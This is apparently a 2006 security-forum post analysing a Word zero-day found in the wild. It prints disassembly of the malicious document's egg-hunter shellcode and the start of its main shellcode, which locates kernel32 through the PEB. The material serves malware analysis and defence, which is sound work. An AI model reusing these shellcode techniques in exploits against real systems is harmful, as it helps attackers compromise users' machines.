Word 0Day
 Kostya Kortchinsky (Kostya) <kostya kortchinsky gmailcom> |
Tuesday, May 23 2006 09:35.01 CDT |
I think we received the 0Day at EADS on May 14th for the 1st time. I've had a look at it then, after a few tries it finally managed to compromise my Office XP SP3 French up2date on a Windows XP SP1 French up2date, but thought it was way too unstable to cause wide troubles. I found the code quite ingenious, even if not very clean. There are 2 shellcode finding shellcodes and a main one. The document embeds a xored binary that is quite fun to analyze, but too long to fit in here :)
It's weird they choose to write in C:\ rather that a non-Administrator writable directory ... whatever, here is the shellcode finding shellcode :
seg000:00000520 FindShellcode_1:
seg000:00000520 33 DB xor ebx, ebx
seg000:00000522 81 C6 00 00 02 00 add esi, 20000h
seg000:00000528
seg000:00000528 loc_528: ; CODE XREF: seg000:00000530j
seg000:00000528 ; seg000:00000536j
seg000:00000528 46 inc esi
seg000:00000529 8B 06 mov eax, [esi]
seg000:0000052B 3D 90 90 64 A1 cmp eax, 0A1649090h
seg000:00000530 75 F6 jnz short loc_528
seg000:00000532 43 inc ebx
seg000:00000533 83 FB 03 cmp ebx, 3
seg000:00000536 75 F0 jnz short loc_528
seg000:00000538 FF E6 jmp esiHere is the main shellcode :
[code]seg000:00000B2E Shellcode:
seg000:00000B2E 90 nop
seg000:00000B2F 90 nop
seg000:00000B30
seg000:00000B30 GetKernel32BaseAddress:
seg000:00000B30 64 A1 30 00 00 00 mov eax, dword ptr fs:unk_30
seg000:00000B36 8B 40 0C mov eax, [eax+0Ch]
seg000:00000B39 8B 70 1C mov esi, [eax+1Ch]
seg000:00000B3C AD lodsd
seg000:00000B3D 8B 70 08 mov esi, [eax+8]
seg000:00000B40 E9 6A 02 00 00 jmp GetEIP
seg000:00000B45
seg000:00000B45 ;
Comments
| Posted: Wednesday, December 31 1969 18:00.00 CST | |